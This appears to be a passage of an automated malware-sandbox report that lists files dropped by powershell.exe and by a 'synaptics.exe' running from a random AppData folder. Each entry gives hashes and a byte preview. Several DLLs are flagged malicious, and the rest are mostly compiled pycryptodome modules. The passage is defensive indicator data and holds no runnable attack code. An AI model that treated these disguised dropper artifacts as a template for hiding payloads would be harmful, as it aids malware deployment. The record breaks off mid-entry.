                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9728
                                                                                                                                                                                                            Entropy (8bit):5.613592555448717
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:AifOsPEGvgmNhTwRjOAyxKO2EEBNJjU/MVn6LlN:AitIaTIjfgPEbdxn6L
                                                                                                                                                                                                            MD5:32422D0F93543D4E78E799AB2EC7CB2F
                                                                                                                                                                                                            SHA1:9F1CEB497D4B6158065772805613B2B978EA6BA5
                                                                                                                                                                                                            SHA-256:605A6225FC7C7C42E37DA23887C866A632D160CF7039E295DC21475537FFC739
                                                                                                                                                                                                            SHA-512:990DC9C922410570A7D0B23C9D3E5BC45128861BFA9D62FDE2FC0618EF050FBAF6BB052583C7378E7DED01E5B28270369044DCC32B49B82F398252D671C38F77
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R.Q.<.Q.<.Q.<.X..U.<...=.S.<...=.R.<.Q.=.r.<...9.Z.<...8.[.<...?.P.<..4.P.<..<.P.<....P.<..>.P.<.RichQ.<.................PE..L...T..f...........!................N........0...............................p............@..........................5......p6..d....P.......................`.......1...............................1..@............0..|............................text............................... ..`.rdata.......0......................@..@.data........@....... ..............@....rsrc........P......."..............@..@.reloc.......`.......$..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11264
                                                                                                                                                                                                            Entropy (8bit):5.670564650362022
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Ai2k9PEGvgLVhjwRjOTHb4R7piK1kF2kVSx8laxHMVn60N:AixIbjIjSHbU7pjkFxVSx8lax2n6e
                                                                                                                                                                                                            MD5:B3E2243F2AF60DE0E873B666B5866F81
                                                                                                                                                                                                            SHA1:FAE0686129BCFD4643043F9AEFA0487F6CA355FE
                                                                                                                                                                                                            SHA-256:28F7E959204DAB74AF5B7EF7F521474F920C41D260C9CAD92D3AC13B908FF5CE
                                                                                                                                                                                                            SHA-512:74EECE302504549CBD285A3DB809506DEFFE38C8954A5C42BC037841B482901098F8F1C2534707AD84EB62636DB42AED26311897FEF73F61ED515E4579FD0C8B
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R.Q.<.Q.<.Q.<.X..U.<...=.S.<...=.R.<.Q.=.r.<...9.Z.<...8.[.<...?.P.<..4.P.<..<.P.<....P.<..>.P.<.RichQ.<.................PE..L...U..f...........!................N........0...............................p............@..........................5.......5..d....P.......................`..l....0...............................1..@............0..|............................text...+........................... ..`.rdata..(....0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc..l....`.......*..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12288
                                                                                                                                                                                                            Entropy (8bit):5.775830212890391
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:AigaktPEOnvQE5ghZUmEjO8W0INzk6l40fByk+z54GostC5MVn63vINC:Aigd4nZAjHW0N6O05PI54lstCwn63vS
                                                                                                                                                                                                            MD5:2FCC310D5F2DE634F2BE7899088A55EE
                                                                                                                                                                                                            SHA1:B43CD493206079C874797799739655E796346C36
                                                                                                                                                                                                            SHA-256:142DAD073BB870AB18B8414C5BFC04E4F5BC29B57CE0437388E9E827B08B5E9D
                                                                                                                                                                                                            SHA-512:FBC637A562EB3B8FCCEC5E77A8301A76DEB9F6BCF2FD4A3DEF2163A92BA02B18E8A85EA527860A440A0CB84D23D9CBD3063359894BC5DCBAC13236F61734C184
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R.Q.<.Q.<.Q.<.X..U.<...=.S.<...=.R.<.Q.=.r.<...9.Z.<...8.[.<...?.P.<..4.P.<..<.P.<....P.<..>.P.<.RichQ.<.................PE..L...U..f...........!................N........0...............................p............@..........................4.......5..d....P.......................`..l....0...............................0..@............0..|............................text...+........................... ..`.rdata.......0....... ..............@..@.data........@.......*..............@....rsrc........P.......,..............@..@.reloc..l....`......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18432
                                                                                                                                                                                                            Entropy (8bit):5.93781135689902
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:AiKO30txbcjyXvqnRfHmNltZrbR8vLmR0Nna3I:Obon1mN1bkv1a3I
                                                                                                                                                                                                            MD5:9BD12AEEE4836D3C933662DF2A5E513E
                                                                                                                                                                                                            SHA1:FD4AD3956EF5585FE36933C1764A41D2BB79361E
                                                                                                                                                                                                            SHA-256:6F35DB5E531E1F7A29C9CAD0A9510A090D7B351AB3AD940C908AB60D9AA2E97F
                                                                                                                                                                                                            SHA-512:EBB8937B7E08D02F360EB5DACC0EA5ABCFA8BDA5C3FF1B67C151428722524677C78EC7266FD4231FCC4DEC1CD7E1D5787FC346B4A21135CEBF5969252225D00C
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R.Q.<.Q.<.Q.<.X..U.<...=.S.<...=.R.<.Q.=.r.<...9.Z.<...8.[.<...?.P.<..4.P.<..<.P.<....P.<..>.P.<.RichQ.<.................PE..L...V..f...........!.....2..........N........P............................................@..........................U.......V..d....p..........................t....Q...............................Q..@............P..|............................text..."0.......2.................. ..`.rdata.. ....P.......6..............@..@.data...0....`.......B..............@....rsrc........p.......D..............@..@.reloc..t............F..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38400
                                                                                                                                                                                                            Entropy (8bit):6.234473651160317
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:z1kDX1bEjUqmGtxaYLKpFHiAn3F2gcZc8Mq1GJ8ehed84Vn1na3I:zmTdRjGx+YkFAMBJ8wee4Vn9a3I
                                                                                                                                                                                                            MD5:14BBFBCCF3ACED88755F8D825294422E
                                                                                                                                                                                                            SHA1:918AFD5A3AB1DE4BF2281F724266C4319A0D0FD7
                                                                                                                                                                                                            SHA-256:7F29140CEB96BAE0DF43EF3338162B7CF933D2CB85A98FA18812C0710EE5C271
                                                                                                                                                                                                            SHA-512:3D6A0E510AC25865CCA32BDEA2D72A5BB25DCEF1AC71DF86D4AFB1015796C3E6D4D2282EE06B82CBEB45E5E5090735378A3451A53F75C1A8FEFD6A27171BD11D
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-...C...C...C......C..B...C..B...C...B..C..F...C..G...C..@...C.?.K...C.?.C...C.?....C.?.A...C.Rich..C.................PE..L...W..f...........!................N.....................................................@.................................h...d...............................t...p...................................@...............|............................text...%........................... ..`.rdata..............................@..@.data...8...........................@....rsrc...............................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):39424
                                                                                                                                                                                                            Entropy (8bit):6.2256652416664435
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:I8enFQj+qItxaYLKpFHiAn3F2gcZc8Mq1GJ8ehed/vRna34q:I8KVJx+YkFAMBJ8wetha34
                                                                                                                                                                                                            MD5:78170CDF88B567FD29DFA02E9C2ABA04
                                                                                                                                                                                                            SHA1:05683A1EA1FAF5B6B96D4F20CD21026CA0BD11AB
                                                                                                                                                                                                            SHA-256:75E586CD3A9D9738BF2E6C2E0CD70EC52EF17AC80C4B6A4BBED15DE576BBDA19
                                                                                                                                                                                                            SHA-512:60F7006DED96E0E53A97700FDE2C626AF632B5B88F1AAD6393901178D92E44E0DA7C178004F8D94018FE9E7038C952D8E64BC7B9B30E2F065551D2C04B53892D
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-...C...C...C......C..B...C..B...C...B..C..F...C..G...C..@...C.?.K...C.?.C...C.?....C.?.A...C.Rich..C.................PE..L...X..f...........!................N.....................................................@....................................d......................................................................@...............|............................text............................... ..`.rdata..`...........................@..@.data...8...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3008
                                                                                                                                                                                                            Entropy (8bit):5.230297505186991
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:KIB0jcQHMsvI/S3oCFXcgHP76Mn6Gsh2L4ZMGdnP7rUjDDM+rDttfakWGL8A:dFQHvoc76MneU0P+X
                                                                                                                                                                                                            MD5:273FE2618CACD783CC30C94EB92B1F76
                                                                                                                                                                                                            SHA1:0E303EDEB936B8F552F30AAAF4953B9A6F29B8D4
                                                                                                                                                                                                            SHA-256:79AA947F1C29D838ADF9FB696FE5EFC169FA67C73CCEE8ABB89FD65985D6B440
                                                                                                                                                                                                            SHA-512:01BF678948D0C0F6FB02718D2619140580B0F735D02D87433136DA65916C7A8C8C4E7F734DF2B063209693A56BD3F8D2D4E5E2E879543E9EEB5425838B0D0315
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2085
                                                                                                                                                                                                            Entropy (8bit):5.17608688273199
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:aF9+C++h+N+9+jZ+c+4+8+v1tZccj8ny7Mk8kjqu5BCViGHh29398O4Q:aF94UgQY7nTaZccj8ny7Mk8kjqu5BCVO
                                                                                                                                                                                                            MD5:36A0E0920BC50C5AC662383955E311A1
                                                                                                                                                                                                            SHA1:FFF119192B3BB62C9EC36F076FE2F65012BB0DEA
                                                                                                                                                                                                            SHA-256:A4763996875B02499733BA1336240470992D9B7C5B1AF986DD0FE6FFC52F5642
                                                                                                                                                                                                            SHA-512:78B5C6B11A20678902A236FAE88E1E78D933475D5AD618054B6D0FF9FCC6F9F2A1CD92B8D745D92CDDA9BDDA1DB621333ACAEAAF3E3332E7DD8094E4CAAD4D34
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import overload..from typing_extensions import Literal....from Crypto.Hash.SHA1 import SHA1Hash..from Crypto.Hash.SHA224 import SHA224Hash..from Crypto.Hash.SHA256 import SHA256Hash..from Crypto.Hash.SHA384 import SHA384Hash..from Crypto.Hash.SHA512 import SHA512Hash..from Crypto.Hash.SHA3_224 import SHA3_224_Hash..from Crypto.Hash.SHA3_256 import SHA3_256_Hash..from Crypto.Hash.SHA3_384 import SHA3_384_Hash..from Crypto.Hash.SHA3_512 import SHA3_512_Hash....@overload..def new(name: Literal["1.3.14.3.2.26"]) -> SHA1Hash: .....@overload..def new(name: Literal["SHA1"]) -> SHA1Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.4"]) -> SHA224Hash: .....@overload..def new(name: Literal["SHA224"]) -> SHA224Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.1"]) -> SHA256Hash: .....@overload..def new(name: Literal["SHA256"]) -> SHA256Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.2"]) -> SHA384Hash: .....@overload..def new(name: Lit
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7307
                                                                                                                                                                                                            Entropy (8bit):5.260707163872319
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ivykv8y2Ed5cPnd8Pr+jnH02x8yC0enZH3i2Ms+dlFKyXcfT7b2k1hITnSHWalQ7:ryC8D+n8yC0rsePJXOz29S7QGLm
                                                                                                                                                                                                            MD5:287130927ACD5440D2BAD553E0BFEF81
                                                                                                                                                                                                            SHA1:6611E5FC33112BD7EC04773AA42495445A00EA26
                                                                                                                                                                                                            SHA-256:6B5538C22A294A82F48AEE391F04290012178FF410A290E516B038B154FB8C8D
                                                                                                                                                                                                            SHA-512:B5F5093E89FC5AC66BAF960DB3A06D00E3BDF9E3F5C4FE966A2C8AA7058AFA3641EC0E25D306E8DF44037B64DF929C3BD7CA2A1999147363B919D632578B439F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.%.......................@...sr...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.)......)...unhexlify)...bord..tobytes)...get_random_bytes)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._BLAKE2sa..... int blake2s_init(void **state,. const uint8_t *key,. size_t key_size,. size_t digest_size);. int blake2s_destroy(void *state);. int blake2s_update(void *state,. const uint8_t *buf,. size_t len);. int blake2s_digest(const void *state,. uint8_t digest[32]);. int blake2s_copy(co
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7963
                                                                                                                                                                                                            Entropy (8bit):5.38561466085709
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:3k8UGdR3AHmrFQCkGU3hoM2ziFjp+KYWBKsNH3Pj:U8UGPQHmrFQJGUCM2ziFd+BP6XPj
                                                                                                                                                                                                            MD5:28BE633DAAA6EF43EE93F2BD5033B606
                                                                                                                                                                                                            SHA1:CF70CD5EC6A85F48A1F2EB6D3F6750C29B257BA9
                                                                                                                                                                                                            SHA-256:DCAED13B9744CB4680ADBA7B8F4A145DC870802EA8724A1939D1AA68133DFAA5
                                                                                                                                                                                                            SHA-512:3FBC6B93D0C445DC6F41C8DEC24F9564F741FB1F703E1638BFF0F94E97192834862DE2F0DB143CB7A57743A663F87F06CF75860C00EAEE03F74045646E32CB1A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g:*.......................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.d.d...Z.G.d.d...d.e...Z.....d.d.d...Z.d.S.)......)...unhexlify)...BLAKE2s)...strxor)...long_to_bytes..bytes_to_long)...bord..tobytes.._copy_bytes)...get_random_bytesNc....................C...s,...t.|...d.>.|.A.}.t.|.t.|.....t.|.....d.....S.).N.....).r....r......len)...bsZ.xor_lsb..num..r.....gC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\Crypto/Hash/CMAC.py.._shift_bytes$...s........r....c....................@...sT...e.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...CMACz.A CMAC hash object.. Do not instantiate directly. Use the :func:`new` function... :ivar digest_size: the size in bytes of the resulting MAC tag. :vartype digest_size: integer. Nc....................C...sD...|.|._.t.d.d.|...|._.|.|._.|.|._.|.j...|._.}.d.|._.|.|._.|.d.k.r&d.}.d.|._.n.|.d.k.r0d.}.d.|.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7937
                                                                                                                                                                                                            Entropy (8bit):5.383643606225201
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:gkzUGdR3AHmrFQCkRU3hoM2wis+jpxKmWBKskH3Pj:xzUGPQHmrFQJRUCM2wiZdxzPzXPj
                                                                                                                                                                                                            MD5:A6A1CA9470C7E19983E75C506AB1CB43
                                                                                                                                                                                                            SHA1:30B83E645478F6059D7BC896EEBA87FA701B9ECB
                                                                                                                                                                                                            SHA-256:CE79FDF6F1F2F07CB9FEB70B00DC33B6BE4AEB0FB4FAD8FC68B9CB82757CB66F
                                                                                                                                                                                                            SHA-512:4A653A10120C525885468F46BA2F1AA71115813477D9B62E67412815953C108861B31F3F9BC29D0522C1A9FDDB9C26F8BE846ACFC5EFA277EBD0CBEC055CB1F7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g:*.......................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.d.d...Z.G.d.d...d.e...Z.....d.d.d...Z.d.S.)......)...unhexlify)...BLAKE2s)...strxor)...long_to_bytes..bytes_to_long)...bord..tobytes.._copy_bytes)...get_random_bytesNc....................C...s,...t.|...d.>.|.A.}.t.|.t.|.....t.|.....d.....S.).N.....).r....r......len)...bsZ.xor_lsb..num..r.....MC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Hash\CMAC.py.._shift_bytes$...s........r....c....................@...sT...e.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...CMACz.A CMAC hash object.. Do not instantiate directly. Use the :func:`new` function... :ivar digest_size: the size in bytes of the resulting MAC tag. :vartype digest_size: integer. Nc....................C...sD...|.|._.t.d.d.|...|._.|.|._.|.|._.|.j...|._.}.d.|._.|.|._.|.d.k.r&d.}.d.|._.n.|.d.k.r0d.}.d.|._.n.t.d.|.......d.|...}.|.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6367
                                                                                                                                                                                                            Entropy (8bit):5.473238666729409
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:OqnCPUNnlO1qs4mQ8UGLe57h6edAGJHFMxdO3vCqA2MwqQH3SzCFKK0MFBPhXC0I:TfQzexh6JdtJtAJFPQ9
                                                                                                                                                                                                            MD5:2115BF31F8E1800EEC7378FD67D21984
                                                                                                                                                                                                            SHA1:2B1195F2D317CD40783FE259702A2FF86BAB8CCF
                                                                                                                                                                                                            SHA-256:74FB3A935FA5F2000C5E5B73CE0D7CE8E96656C84C761BC22109119610CD23B4
                                                                                                                                                                                                            SHA-512:F5CAA10D581F2745D46306E807C51DD4EB70001E83412FCD8BE001E7CA578E65D467088A91A1C06A1571AC60D0BF3FEBADE312394E0E2991754B24C52EC47AC6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g. .......................@...s....d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.d.d.d.d.d.d.d.d.d.d.d.d...Z.d.d...e.....D...Z.G.d.d...d.e...Z.d.d.d...Z.d.S.)......)...bord..tobytes)...unhexlify)...BLAKE2s)...strxor)...get_random_bytes..new..HMACz.1.2.840.113549.2.7z.1.2.840.113549.2.8z.1.2.840.113549.2.9z.1.2.840.113549.2.10z.1.2.840.113549.2.11z.1.2.840.113549.2.12z.1.2.840.113549.2.13z.2.16.840.1.101.3.4.2.13z.2.16.840.1.101.3.4.2.14z.2.16.840.1.101.3.4.2.15z.2.16.840.1.101.3.4.2.16).z.1.3.14.3.2.26z.2.16.840.1.101.3.4.2.4z.2.16.840.1.101.3.4.2.1z.2.16.840.1.101.3.4.2.2z.2.16.840.1.101.3.4.2.3z.2.16.840.1.101.3.4.2.5z.2.16.840.1.101.3.4.2.6z.2.16.840.1.101.3.4.2.7z.2.16.840.1.101.3.4.2.8z.2.16.840.1.101.3.4.2.9z.2.16.840.1.101.3.4.2.10c....................C...s....i.|.].\.}.}.|.|...q.S...r....)....0..k..vr....r.....MC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Hash\HMAC.py..<dictcomp>:...s......r....c....................@...sR
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5421
                                                                                                                                                                                                            Entropy (8bit):5.188027745089437
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:nbykvVEVoaG0Ed5chlD1HkiM7wmZH3wmbOs6Q1/wQbya2qzgRlpXnFMNh:nhETDkFbAQVwQPsRPA
                                                                                                                                                                                                            MD5:48B49E4141205ED011B6F0C370B14D24
                                                                                                                                                                                                            SHA1:06639418D458BBF97729FAEAAFCD357BEA03E3C8
                                                                                                                                                                                                            SHA-256:B02CFE4B398DFA98038AEB184D05A01193761395881B9234FA9CCF8F8E6AFC36
                                                                                                                                                                                                            SHA-512:F2636E62B9B276EC2CD601D94E6A5865FBFA40399998F628DE983E8F340308BC5400B80ED085C7D7BED6578B2CBE382BCF8FBAD4A79CCA9692F2899D47056BE4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sd...d.d.l.T.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d.d...Z.d.Z.d.Z.d.d...Z.d.S.)......)...*)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._MD5a..... #define MD5_DIGEST_SIZE 16.. int MD5_init(void **shaState);. int MD5_destroy(void *shaState);. int MD5_update(void *hs,. const uint8_t *buf,. size_t len);. int MD5_digest(const void *shaState,. uint8_t digest[MD5_DIGEST_SIZE]);. int MD5_copy(const void *src, void *dst);.. int MD5_pbkdf2_hmac_assist(const void *inner,. const void *outer,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5444
                                                                                                                                                                                                            Entropy (8bit):5.1943641502664235
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Mtykvm51RUT7NCaGuEd5SCzor1HcMM7AF8ZH3w7MbOs6IVFya28zTlpXJ1MB5:Mc51RC7NrC0rcTbAIVjXxU
                                                                                                                                                                                                            MD5:E2F10D79EA5176C7B19C918C6644D284
                                                                                                                                                                                                            SHA1:5099B2CAD907BA0969064B398AE6485DB5672C48
                                                                                                                                                                                                            SHA-256:CAC5C3450507329464B2CBA3D03759FF9071EB1773960B6617D5D47C82B47161
                                                                                                                                                                                                            SHA-512:B8725DDB9DE0FF30B5BC7697C91179EC559B55A3F9E77D43CC26CE56BE1703FDB98B2FB3BCE412DFF43DD8B1BE9E81A58C6B4ACF1BCBDEAE2E3696A618718ED9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sh...d.d.l.T.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d.d...Z.e.j.Z.e.j.Z.d.d...Z.d.S.)......)...*)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._SHA1a..... #define SHA1_DIGEST_SIZE 20.. int SHA1_init(void **shaState);. int SHA1_destroy(void *shaState);. int SHA1_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA1_digest(const void *shaState,. uint8_t digest[SHA1_DIGEST_SIZE]);. int SHA1_copy(const void *src, void *dst);.. int SHA1_pbkdf2_hmac_assist(const void *inner,. const void *outer,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5617
                                                                                                                                                                                                            Entropy (8bit):5.185158564879765
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ukykv4XXR6TJDkKGAEd58i5c1HqO2NZH3Hb4fOs6viWkZLgz47MrxK:uhXXR8JDg5cyj4fAvTWURK
                                                                                                                                                                                                            MD5:623B08DADFB709BD4E20975A9D74C431
                                                                                                                                                                                                            SHA1:3A8A1CBDAE35D880E5CB9CFD0C205E5884E592EB
                                                                                                                                                                                                            SHA-256:1F6C4FC87449205B986A5175A190C60EC9F10758331C3406F7CC0B7A1A6F7CBF
                                                                                                                                                                                                            SHA-512:5D8DECC44EB2193167A86F9525375828FE0BC7DBEA0665B78B4205E7C82F1F7183158B0071EC0E3E4754486BF4C7E424BA98A96F1D82327A9A998176E31B1058
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sl...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d.d...Z.e.j.Z.e.j.Z.d.d...Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._SHA256a..... int SHA256_init(void **shaState);. int SHA256_destroy(void *shaState);. int SHA256_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA256_digest(const void *shaState,. uint8_t *digest,. size_t digest_size);. int SHA256_copy(const void *src, void *dst);.. int SHA256_pbkdf2_hmac_assist(const void *inner,. const void *outer,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1716
                                                                                                                                                                                                            Entropy (8bit):5.630533336211545
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:+okzpHdkloLwZGD20+wMmqlZ6tBZKBTIIIXII5p6:+lHd/20uSzgBG4
                                                                                                                                                                                                            MD5:4967092305548CE67B1AF379BDFC7D46
                                                                                                                                                                                                            SHA1:499FF0872882CC3F25A1079061756EA63CA286E3
